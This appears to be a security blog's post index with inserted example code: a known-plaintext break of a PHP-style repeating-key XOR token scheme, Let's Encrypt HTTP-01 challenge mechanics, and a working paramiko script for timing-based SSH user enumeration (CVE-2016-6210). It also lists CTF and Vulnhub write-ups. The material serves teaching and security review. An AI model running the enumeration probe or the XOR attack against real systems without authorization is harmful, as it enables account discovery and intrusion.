I recently did a code review assessment on an application for one of my clients. The best part of the application was their own cryptography algorithm.
Moreover, the application was written in PHP, and PHP does some strange things with strings, characters and XOR operations. It only needed a few lines of Python to break it.
TL;DR : please do not write your own crypto!
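As an added illustration of the TL;DR above (this is not the client's algorithm nor the script from the post; the scheme, the key and the token are constructed), the block below emulates PHP's string XOR quirk and then breaks a repeating-key XOR "cipher" with a known-plaintext attack. The crib (`{"user":"`) is an assumption about the message format that a reviewer would typically have.

```python
"""Added example: why a home-made XOR scheme falls in a few lines of Python.
Not the reviewed application's code; key, messages and crib are constructed."""

import string


def php_string_xor(a: bytes, b: bytes) -> bytes:
    """Emulate PHP's `$a ^ $b` on two strings: the operands are XORed byte by byte
    and the result is truncated to the length of the SHORTER operand.  A 'cipher'
    built directly on this silently drops the tail of any message longer than its key."""
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_key_xor(data: bytes, key: bytes) -> bytes:
    """The usual 'fix' for the truncation: repeat the key over the data.
    Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("empty key")
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))


def recover_key(ciphertext: bytes, crib: bytes, offset: int, key_len: int) -> bytes:
    """Known-plaintext attack on repeating-key XOR.
    c[i] = p[i] ^ k[i % key_len], so every known plaintext byte reveals one key byte.
    If the crib hits the same key slot twice with different values, key_len is wrong."""
    if len(crib) < key_len:
        raise ValueError("crib must be at least key_len bytes to recover the whole key")
    key = [None] * key_len
    for i, p in enumerate(crib):
        pos = offset + i
        slot = pos % key_len
        k = ciphertext[pos] ^ p
        if key[slot] is None:
            key[slot] = k
        elif key[slot] != k:
            raise ValueError(f"inconsistent key byte at slot {slot}: key_len {key_len} is wrong")
    return bytes(key)


# Constructed sample: a session token "protected" with a 5-byte key.
KEY = b"s3cr3"
PLAINTEXT = b'{"user":"alice","role":"admin","exp":1700000000}'
CIPHERTEXT = repeating_key_xor(PLAINTEXT, KEY)
# Assumed attacker knowledge: every token starts with this prefix.
CRIB = b'{"user":"'


def break_token(ciphertext: bytes = CIPHERTEXT, crib: bytes = CRIB, max_key_len: int = 16):
    """Try key lengths in increasing order; the first one on which the crib is
    self-consistent and the whole message decrypts to printable ASCII wins.
    Returns (key, plaintext)."""
    printable = set(string.printable.encode("ascii"))
    for key_len in range(1, min(max_key_len, len(crib)) + 1):
        try:
            key = recover_key(ciphertext, crib, 0, key_len)
        except ValueError:
            continue  # crib contradicts itself at this length
        plain = repeating_key_xor(ciphertext, key)
        if all(b in printable for b in plain):
            return key, plain
    raise ValueError("no key length up to max_key_len fits the crib")


if __name__ == "__main__":
    # PHP-style XOR loses everything past the key length: 3 bytes survive here.
    print(len(php_string_xor(b"hello world", b"key")))
    key, plain = break_token()
    print(key, plain)
```

The point a reviewer wants on record: with XOR and a short key, one known message prefix hands over the key for every message ever produced with it, and no amount of "obfuscation" around the XOR changes that.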
Since January this blog has been built automatically using Travis CI. The main advantage is that it always uses the latest version of Pelican, as Travis CI builds its environment from scratch. Another advantage is that I can update the site directly from my browser for minor modifications (spelling corrections, for instance).
This weekend was the Insomni'hack teaser CTF. I participated with the team The Half Crunchy.
The theme was "RISE OF THE MACHINES" with rogue webserver and flawing cat robot.
We finished 42nd with 550 points, flagging 5 challenges:
Many thanks to the organisers! It was a really nice CTF.
Thanks to all team members who participated.
Let's Encrypt provides free and easy SSL/TLS certificates. Nevertheless, it needs to verify that you control the domain it is issuing for. To do that we usually use HTTP verification, with a challenge file served from the .well-known directory.
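To make the verification step concrete, here is an added example (not the post's own setup or any ACME client's code) of what the HTTP-01 challenge actually exchanges, following RFC 8555 section 8.3 and the JWK thumbprint of RFC 7638: the CA fetches `/.well-known/acme-challenge/<token>` over plain HTTP and expects the body to be `<token>.<thumbprint of the account key>`. The account key and token below are constructed stand-ins, not real key material.

```python
import base64
import hashlib
import json
import re

# Added example of the HTTP-01 challenge mechanics (RFC 8555 section 8.3).
# Not the post's own setup; the account key and token below are constructed.


def b64url(data: bytes) -> str:
    """Base64url without padding, as ACME uses throughout."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def jwk_thumbprint(jwk: dict) -> str:
    """RFC 7638 thumbprint: SHA-256 over the REQUIRED JWK members only, keys in
    lexicographic order, no whitespace.  Optional members such as "kid" or "alg"
    must not take part, otherwise the thumbprint will not match the CA's."""
    required = {"RSA": ("e", "kty", "n"), "EC": ("crv", "kty", "x", "y")}
    members = {k: jwk[k] for k in required[jwk["kty"]]}
    canonical = json.dumps(members, sort_keys=True, separators=(",", ":"))
    return b64url(hashlib.sha256(canonical.encode("utf-8")).digest())


def key_authorization(token: str, account_jwk: dict) -> str:
    """Body that must be served for the challenge: token '.' thumbprint(account key).
    Binding the account key in proves the challenge was answered by the account
    that requested the certificate, not by whoever can write into the webroot."""
    return f"{token}.{jwk_thumbprint(account_jwk)}"


TOKEN_RE = re.compile(r"[A-Za-z0-9_-]+")


def challenge_path(token: str) -> str:
    """URL path (and, under the webroot, file path) the CA will fetch.  The token
    is CA-supplied input that ends up in a filesystem path, so refuse anything
    outside the base64url alphabet before touching the disk."""
    if not TOKEN_RE.fullmatch(token):
        raise ValueError("token is not base64url")
    return f"/.well-known/acme-challenge/{token}"


def ca_would_accept(served_body: bytes, token: str, account_jwk: dict) -> bool:
    """The comparison the CA performs on what it fetched: the body must equal the
    key authorization; trailing whitespace is tolerated by the RFC."""
    expected = key_authorization(token, account_jwk).encode("ascii")
    return served_body.rstrip(b" \t\r\n") == expected


# Constructed demo values: this is NOT a real RSA key and not a token from a real CA.
ACCOUNT_JWK = {"kty": "RSA", "e": "AQAB", "n": "constructed-fake-modulus_0123456789"}
TOKEN = "evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA"

if __name__ == "__main__":
    body = key_authorization(TOKEN, ACCOUNT_JWK)
    print(challenge_path(TOKEN))
    print(body)
    print(ca_would_accept((body + "\n").encode(), TOKEN, ACCOUNT_JWK))
```

The two practitioner checks worth keeping from this: the thumbprint must be computed over the required members only, and the token must be validated before it is turned into a file name under the webroot.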
Building a kiosk where Google Chrome runs in full screen and user interaction with the system is reduced to the minimum.
Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (Source: Red Hat)
On the 13th of July a new wild CVE appeared (yes, Pokémon Go is still the buzz of the moment).
CVE-2016-6210 allows user enumeration on an SSH server by comparing the response time of authentication attempts for non-existing users against that for existing ones. It affects OpenSSH sshd version 7.2p2 and earlier (fixed in OpenSSH 7.3).
That means that, with a good dictionary, you can find out which user accounts exist on the server.
This post just demonstrates how to exploit this vulnerability with a simple example.
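As an added illustration of the timing comparison (not the post's own script), the block below shows the two halves of such a probe: timing one password-authentication attempt with paramiko, and deciding from several measurements whether a name exists. The host name, user list, password length and the recorded timings are all constructed for the example. The direction of the gap depends on which password hash the target uses, so the decision is made relative to a baseline name that certainly does not exist rather than by assuming which side is slower.

```python
import socket
import time
from statistics import median

# Added illustration of probing CVE-2016-6210; not the post's own script.  Host,
# user list, password length and the timing samples below are constructed.

# Public PoCs send a very long password: a vulnerable sshd takes a different hashing
# path for a non-existing user, and a long password widens the timing gap.
PROBE_PASSWORD = "A" * 25000  # assumed amplification length, not taken from the post


def measure_auth_time(host, username, password=PROBE_PASSWORD, port=22, timeout=15.0):
    """Time a single password-authentication attempt.  paramiko is imported lazily so
    the analysis functions below can be used offline on recorded timings."""
    import paramiko  # third-party; only needed for live probing
    sock = socket.create_connection((host, port), timeout=timeout)
    transport = paramiko.Transport(sock)
    try:
        transport.start_client(timeout=timeout)
        started = time.monotonic()
        try:
            transport.auth_password(username, password)
        except paramiko.AuthenticationException:
            pass  # expected; only how long the rejection took matters
        return time.monotonic() - started
    finally:
        transport.close()


def collect(host, usernames, probe_name, rounds=5):
    """Measure every candidate plus a name that certainly does not exist, several
    times each and interleaved, so that network jitter hits all names alike."""
    samples = {name: [] for name in [probe_name, *usernames]}
    for _ in range(rounds):
        for name in samples:
            samples[name].append(measure_auth_time(host, name))
    return samples


def classify_users(samples, probe_name, ratio=1.5, min_rounds=3):
    """Flag a user as existing when its median response time differs from the
    non-existing baseline by more than `ratio` in EITHER direction.  Medians, not
    single values, so one slow round trip does not create a phantom user."""
    if len(samples[probe_name]) < min_rounds:
        raise ValueError("not enough baseline samples")
    base = median(samples[probe_name])
    verdict = {}
    for name, times in samples.items():
        if name == probe_name:
            continue
        if len(times) < min_rounds:
            raise ValueError(f"not enough samples for {name}")
        m = median(times)
        verdict[name] = (m > base * ratio) or (m < base / ratio)
    return verdict


# Constructed timings (seconds) for an offline run of the analysis.  Here the
# existing accounts are the slow ones; on other hashing setups the gap can go the
# other way, which is why classify_users() tests both directions.
PROBE = "zz-does-not-exist-4f2a"
SAMPLES = {
    PROBE:   [0.41, 0.39, 0.40, 0.42, 0.40],
    "root":  [1.21, 1.25, 1.19, 1.23, 1.22],
    "alice": [1.18, 1.20, 1.24, 1.19, 1.21],
    "bob":   [0.40, 0.41, 0.39, 0.42, 0.40],
}

if __name__ == "__main__":
    # Live use would be: classify_users(collect("ssh.example.test", ["root", "alice", "bob"], PROBE), PROBE)
    print(classify_users(SAMPLES, PROBE))
```

Two caveats when running this against a real target: several rounds per name are needed because a single measurement is dominated by network jitter, and every failed attempt is logged by sshd and will trip fail2ban-style tooling quickly.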
As Droopy was not really hard and did not contain as many web vulnerabilities as I had hoped for, I tried another VM: SecTalks: BNE0x03 - Simple. There were also hints in the description of the machine, but at my screen resolution they do not appear when just browsing the main page of Vulnhub, so I did not spoil myself with the hints this time.
A few days ago, I installed a new pentesting box based on Arch Linux with Kali in a virtual machine. To test it, I selected a light vulnbox on Vulnhub: Droopy. There were two hints in the description of the machine on the Vulnhub download page:
We will see how to use them in a moment :)